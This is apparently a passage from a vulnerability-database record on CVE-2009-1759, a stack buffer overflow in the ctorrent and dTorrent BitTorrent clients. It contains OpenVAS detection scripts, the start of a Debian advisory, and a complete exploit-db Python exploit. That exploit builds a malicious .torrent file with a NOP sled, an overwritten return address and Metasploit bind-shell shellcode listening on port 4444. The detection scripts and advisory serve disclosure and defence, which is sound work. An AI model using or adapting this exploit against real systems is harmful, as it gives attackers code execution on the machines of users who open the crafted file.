Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=501813\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"ctorrent\", rpm:\"ctorrent~1.3.4~10.dnh3.3.2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ctorrent-debuginfo\", rpm:\"ctorrent-debuginfo~1.3.4~10.dnh3.3.2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-19T10:55:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "description": "The host is installed with CTorrent/Enhanced CTorrent and is\nprone to Buffer Overflow Vulnerability.", "modified": "2017-07-04T00:00:00", "published": "2009-06-01T00:00:00", "id": "OPENVAS:900557", "href": "http://plugins.openvas.org/nasl.php?oid=900557", "type": "openvas", "title": "CTorrent/Enhanced CTorrent Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ctorrent_bof_vuln.nasl 6517 2017-07-04 13:34:20Z cfischer $\n#\n# CTorrent/Enhanced CTorrent Buffer Overflow Vulnerability\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Attackers can exploit this issue by execute arbitrary code via\nspecially crafted torrent files and can cause denial of service.\n\nImpact Level: System/Application \";\n\ntag_affected = \"CTorrent version 1.3.4 on Linux.\nEnhanced CTorrent version 3.3.2 and prior on Linux.\";\n\ntag_insight = \"A stack based buffer overflow is due to a boundary error within\nthe function 'btFiles::BuildFromMI()' in btfiles.cpp while processing torrent\nfiles containing a long path.\";\n\ntag_solution = \"Apply the appropriate patch from the below link,\nhttp://sourceforge.net/p/dtorrent/bugs/14/\nhttp://sourceforge.net/p/dtorrent/code/HEAD/tree\";\n\ntag_summary = \"The host is installed with CTorrent/Enhanced CTorrent and is\nprone to Buffer Overflow Vulnerability.\";\n\nif(description)\n{\n script_id(900557);\n script_version(\"$Revision: 6517 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-04 15:34:20 +0200 (Tue, 04 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-01 09:35:57 +0200 (Mon, 01 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-1759\");\n script_bugtraq_id(34584);\n script_name(\"CTorrent/Enhanced CTorrent Buffer Overflow Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/34752\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8470\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/49959\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_ctorrent_detect.nasl\");\n script_mandatory_keys(\"CTorrent/CTorrent_or_Enhanced/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nctorrentVer = get_kb_item(\"CTorrent/Ver\");\nif(ctorrentVer != NULL)\n{\n if(version_is_equal(version:ctorrentVer, test_version:\"1.3.4\"))\n {\n security_message(0);\n exit(0);\n }\n}\n\nectorrentVer = get_kb_item(\"Enhanced/CTorrent/Ver\");\nif(ectorrentVer != NULL)\n{\n if(version_is_less_equal(version:ectorrentVer, test_version:\"3.3.2\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "description": "The remote host is missing an update to ctorrent\nannounced via advisory DSA 1817-1.", "modified": "2017-07-07T00:00:00", "published": "2009-06-23T00:00:00", "id": "OPENVAS:64252", "href": "http://plugins.openvas.org/nasl.php?oid=64252", "type": "openvas", "title": "Debian Security Advisory DSA 1817-1 (ctorrent)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1817_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1817-1 (ctorrent)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Michael Brooks discovered that ctorrent, a text-mode bittorrent client,\ndoes not verify the length of file paths in torrent files. An attacker\ncan exploit this via a crafted torrent that contains a long file path to\nexecute arbitrary code with the rights of the user opening the file.\n\n\nThe oldstable distribution (etch) does not contain ctorrent.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 1.3.4-dnh3.2-1+lenny1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.3.4-dnh3.2-1.1.\n\n\nWe recommend that you upgrade your ctorrent packages.\";\ntag_summary = \"The remote host is missing an update to ctorrent\nannounced via advisory DSA 1817-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201817-1\";\n\n\nif(description)\n{\n script_id(64252);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-23 15:49:15 +0200 (Tue, 23 Jun 2009)\");\n script_cve_id(\"CVE-2009-1759\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1817-1 (ctorrent)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"ctorrent\", ver:\"1.3.4-dnh3.2-1+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-12-21T00:00:00", "published": "2009-11-11T00:00:00", "id": "OPENVAS:66158", "href": "http://plugins.openvas.org/nasl.php?oid=66158", "type": "openvas", "title": "FreeBSD Ports: ctorrent", "sourceData": "#\n#VID 83d7d149-b965-11de-a515-0022156e8794\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 83d7d149-b965-11de-a515-0022156e8794\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: ctorrent\n\nCVE-2009-1759\nStack-based buffer overflow in the btFiles::BuildFromMI function\n(trunk/btfiles.cpp) in Enhanced CTorrent (aka dTorrent) 3.3.2 and\nprobably earlier, and CTorrent 1.3.4, allows remote attackers to cause\na denial of service (crash) and possibly execute arbitrary code via a\nTorrent file containing a long path.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://sourceforge.net/tracker/?func=detail&aid=2782875&group_id=202532&atid=981959\nhttp://www.vuxml.org/freebsd/83d7d149-b965-11de-a515-0022156e8794.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(66158);\n script_version(\"$Revision: 4824 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-21 09:49:38 +0100 (Wed, 21 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-1759\");\n script_bugtraq_id(34584);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: ctorrent\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"ctorrent\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.3.2_2\")<0) {\n txt += 'Package ctorrent version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "description": "The remote host is missing an update to ctorrent\nannounced via advisory DSA 1817-1.", "modified": "2018-04-06T00:00:00", "published": "2009-06-23T00:00:00", "id": "OPENVAS:136141256231064252", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064252", "type": "openvas", "title": "Debian Security Advisory DSA 1817-1 (ctorrent)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1817_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1817-1 (ctorrent)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Michael Brooks discovered that ctorrent, a text-mode bittorrent client,\ndoes not verify the length of file paths in torrent files. An attacker\ncan exploit this via a crafted torrent that contains a long file path to\nexecute arbitrary code with the rights of the user opening the file.\n\n\nThe oldstable distribution (etch) does not contain ctorrent.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 1.3.4-dnh3.2-1+lenny1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.3.4-dnh3.2-1.1.\n\n\nWe recommend that you upgrade your ctorrent packages.\";\ntag_summary = \"The remote host is missing an update to ctorrent\nannounced via advisory DSA 1817-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201817-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64252\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-23 15:49:15 +0200 (Tue, 23 Jun 2009)\");\n script_cve_id(\"CVE-2009-1759\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1817-1 (ctorrent)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"ctorrent\", ver:\"1.3.4-dnh3.2-1+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "description": "The remote host is missing an update to ctorrent\nannounced via advisory FEDORA-2009-8897.", "modified": "2017-07-10T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:64730", "href": "http://plugins.openvas.org/nasl.php?oid=64730", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8897 (ctorrent)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8897.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8897 (ctorrent)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nSecurity update, fixes a stack-based buffer overflow (CVE-2009-1759).\n\nChangeLog:\n\n* Fri Aug 21 2009 Dominik 'Rathann' Mierzejewski 1.3.4-10.dnh3.3.2\n- fixed stack-based buffer overflow (CVE-2009-1759, RHBZ #501813)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update ctorrent' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8897\";\ntag_summary = \"The remote host is missing an update to ctorrent\nannounced via advisory FEDORA-2009-8897.\";\n\n\n\nif(description)\n{\n script_id(64730);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-1759\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-8897 (ctorrent)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=501813\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"ctorrent\", rpm:\"ctorrent~1.3.4~10.dnh3.3.2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ctorrent-debuginfo\", rpm:\"ctorrent-debuginfo~1.3.4~10.dnh3.3.2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T07:26:40", "description": "cTorrent/DTorrent (.Torrent File) Buffer Overflow Exploit. CVE-2009-1759. Local exploit for linux platform", "published": "2009-04-17T00:00:00", "type": "exploitdb", "title": "cTorrent/DTorrent - .Torrent Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1759"], "modified": "2009-04-17T00:00:00", "id": "EDB-ID:8470", "href": "https://www.exploit-db.com/exploits/8470/", "sourceData": "#!/usr/bin/python\n\n#Written By Michael Brooks\n#04/17/2009\n\n#Stack Based Buffer Overflow \n#The vulnerability is in the btFiles::BuildFromMI function \n#inside the btfiles.cpp file\n\n#Exploit tested on cTorrent 1.3.4 using Debian Sarge using Linux kernel 2.4.27-3-386\n#Can't get the exploit working on a modern linux kernel because of ASLR\n\n#code is using python 2.5\n\n#Home page for cTorrent 1.3.4:\n#http://sourceforge.net/projects/ctorrent/ 161,000+ Downloads\n#dTorrent 3.3.2 is also vulnerable: \n#http://sourceforge.net/projects/dtorrent/ 18,000+ downloads\n\nimport sys\nimport os\n#This code will take any torrent file and turn it into an exploit. \nUSAGE=\"python exploit.py in_file.torrent out_file.torrent\"\n\ndef main():\n #Start of the program\n bfile=fileio()\n try:\n bad_torrent=bfile.read_bencode(sys.argv[1])\n except:\n print USAGE\n sys.exit()\n \n exploit_str=create_exploit()\n print(\"Writing Bytes:\"+str(len(exploit_str)))\n bad_torrent[\"info\"][\"files\"][0][\"path\"][0]=exploit_str\n try:\n bfile.write_bencode(sys.argv[2], bad_torrent)\n except:\n print USAGE\n sys.exit()\n\ndef create_exploit():\n # linux_ia32_bind - LPORT=4444 Size=108 Encoder=PexFnstenvSub http://metasploit.com\n shellcode = \"\\x2b\\xc9\\x83\\xe9\\xeb\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x27\"\n shellcode += \"\\x1a\\xbe\\x4e\\x83\\xeb\\xfc\\xe2\\xf4\\x16\\xc1\\xed\\x0d\\x74\\x70\\xbc\\x24\"\n shellcode += \"\\x41\\x42\\x27\\xc7\\xc6\\xd7\\x3e\\xd8\\x64\\x48\\xd8\\x26\\x36\\x46\\xd8\\x1d\"\n shellcode += \"\\xae\\xfb\\xd4\\x28\\x7f\\x4a\\xef\\x18\\xae\\xfb\\x73\\xce\\x97\\x7c\\x6f\\xad\"\n shellcode += \"\\xea\\x9a\\xec\\x1c\\x71\\x59\\x37\\xaf\\x97\\x7c\\x73\\xce\\xb4\\x70\\xbc\\x17\"\n shellcode += \"\\x97\\x25\\x73\\xce\\x6e\\x63\\x47\\xfe\\x2c\\x48\\xd6\\x61\\x08\\x69\\xd6\\x26\"\n shellcode += \"\\x08\\x78\\xd7\\x20\\xae\\xf9\\xec\\x1d\\xae\\xfb\\x73\\xce\"\n \n #The exact address of our buffer is 0xbffffccc, which ebx tells us\n #however memeory changes before we control the eip, \n #so we change the addr to hit the NOP sled\n eip=\"\\x11\\xf1\\xff\\xbf\"\n #eip=\"\\xcc\\xfc\\xff\\xbf\"#the add ebx is holding\n \n #this is a dummy address to satisfy other pointer before we return\n #this cannot be the EIP becuase this location is written to!\n dumb_addr=\"\\xcc\\xfc\\xff\\xbf\"\n \n #nop sled\n long_str=\"\\x90\"*(4028-len(shellcode))\n #memory around the shellcode is written to, but this is a safe place\n long_str+=shellcode\n #this 100byte buffer is written to before we control the eip\n long_str+=\"\\x90\"*100\n long_str+=eip#4128 bytes is the EIP!\n \n #This pointer must be real becuase it is written to in btFiles::BuildFromMI\n long_str+=dumb_addr#\"this\" \n #We can control these addresses but we don't need them\n #long_str+=dumb_addr#\"metabuf\"\n #long_str+=dumb_addr#\"saveas\"\n return long_str\n \n#Start of functions for bencoding:\ndef BTFailure(msg):\n pass\n\ndef decode_int(x, f):\n f += 1\n newf = x.index('e', f)\n n = int(x[f:newf])\n if x[f] == '-':\n if x[f + 1] == '0':\n raise ValueError\n elif x[f] == '0' and newf != f+1:\n raise ValueError\n return (n, newf+1)\n\ndef decode_string(x, f):\n colon = x.index(':', f)\n n = int(x[f:colon])\n if x[f] == '0' and colon != f+1:\n raise ValueError\n colon += 1\n return (x[colon:colon+n], colon+n)\n\ndef decode_list(x, f):\n r, f = [], f+1\n while x[f] != 'e':\n v, f = decode_func[x[f]](x, f)\n r.append(v)\n return (r, f + 1)\n\ndef decode_dict(x, f):\n r, f = {}, f+1\n while x[f] != 'e':\n k, f = decode_string(x, f)\n r[k], f = decode_func[x[f]](x, f)\n return (r, f + 1)\n\ndecode_func = {}\ndecode_func['l'] = decode_list\ndecode_func['d'] = decode_dict\ndecode_func['i'] = decode_int\ndecode_func['0'] = decode_string\ndecode_func['1'] = decode_string\ndecode_func['2'] = decode_string\ndecode_func['3'] = decode_string\ndecode_func['4'] = decode_string\ndecode_func['5'] = decode_string\ndecode_func['6'] = decode_string\ndecode_func['7'] = decode_string\ndecode_func['8'] = decode_string\ndecode_func['9'] = decode_string\n\ndef bdecode(x):\n try:\n r, l = decode_func[x[0]](x, 0)\n except (IndexError, KeyError, ValueError):\n raise BTFailure(\"not a valid bencoded string\")\n if l != len(x):\n raise BTFailure(\"invalid bencoded value (data after valid prefix)\")\n return r\n\nfrom types import StringType, IntType, LongType, DictType, ListType, TupleType\n\n\nclass Bencached(object):\n\n __slots__ = ['bencoded']\n\n def __init__(self, s):\n self.bencoded = s\n\ndef encode_bencached(x,r):\n r.append(x.bencoded)\n\ndef encode_int(x, r):\n r.extend(('i', str(x), 'e'))\n\ndef encode_bool(x, r):\n if x:\n encode_int(1, r)\n else:\n encode_int(0, r)\n \ndef encode_string(x, r):\n r.extend((str(len(x)), ':', x))\n\ndef encode_list(x, r):\n r.append('l')\n for i in x:\n encode_func[type(i)](i, r)\n r.append('e')\n\ndef encode_dict(x,r):\n r.append('d')\n ilist = x.items()\n ilist.sort()\n for k, v in ilist:\n r.extend((str(len(k)), ':', k))\n encode_func[type(v)](v, r)\n r.append('e')\n\nencode_func = {}\nencode_func[Bencached] = encode_bencached\nencode_func[IntType] = encode_int\nencode_func[LongType] = encode_int\nencode_func[StringType] = encode_string\nencode_func[ListType] = encode_list\nencode_func[TupleType] = encode_list\nencode_func[DictType] = encode_dict\n\ntry:\n from types import BooleanType\n encode_func[BooleanType] = encode_bool\nexcept ImportError:\n pass\n\ndef bencode(x):\n r = []\n encode_func[type(x)](x, r)\n return ''.join(r)\n\nclass fileio:\n def read_bencode(self,file):\n infile = open(file,\"r\")\n file=infile.read()\n infile.close\n return bdecode(file)\n \n #writes a dictionary to a bencoded file\n def write_bencode(self,file,dict):\n outfile = open(file, 'wb')\n outfile.write(bencode(dict))\n outfile.close() \n \n#execute main\nmain()\n\n# milw0rm.com [2009-04-17]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/8470/"}], "debian": [{"lastseen": "2019-05-30T02:22:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1759"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA-1817-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nJune 17th, 2009 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : ctorrent\nVulnerability : stack-based buffer overflow\nProblem type : local (remote)\nDebian-specific: no\nDebian bug : 530255\nCVE ID : CVE-2009-1759\n\n\nMichael Brooks discovered that ctorrent, a text-mode bittorrent client,\ndoes not verify the length of file paths in torrent files. An attacker\ncan exploit this via a crafted torrent that contains a long file path to\nexecute arbitrary code with the rights of the user opening the file.\n\n\nThe oldstable distribution (etch) does not contain ctorrent.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 1.3.4-dnh3.2-1+lenny1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.3.4-dnh3.2-1.1.\n\n\nWe recommend that you upgrade your ctorrent packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n 